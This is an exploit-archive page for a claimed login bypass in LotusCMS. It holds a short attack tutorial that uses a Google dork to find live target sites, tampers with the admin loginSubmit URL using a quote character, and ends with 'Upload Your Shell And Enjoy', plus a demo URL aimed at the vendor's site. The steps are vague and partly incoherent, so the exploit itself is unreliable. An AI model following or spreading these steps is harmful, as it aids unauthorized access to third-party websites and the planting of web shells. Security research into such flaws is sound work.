LotusCMS Bypass Login Vulnerability

2017.02.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|=============================================================| | |-------------------In The Name Of God------------------------| | | Exploit Title : LotusCMS Bypass Login Vulnerability | | Exploit Author : Ashiyane Digital Security Team | | Google Dork : intext:Proudly Powered by: LotusCMS | Tested on : Kali linux | | Date : 2/17/2017 | | Vendor HomePage : http://www.lotuscms.org | |======================================| | | Tutorial : | | Search The Dork Or Go To Vendor HomePage And Select Your Target | Then Go To Admin Panel At : /index.php?system=Admin&page=loginSubmit | Paste The Target With ' Character : Target' | At Last Change Url To : site/admin/index.php?system=Admin&page=loginSubmit | Upload Your Shell And Enjoy ! | Demo: | http://www.lotuscms.org/index.php?system=Admin&page=loginSubmit' |=============================================================| | Discovered By : Terminator Special Tnx 2 : My PC |=============================================================|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top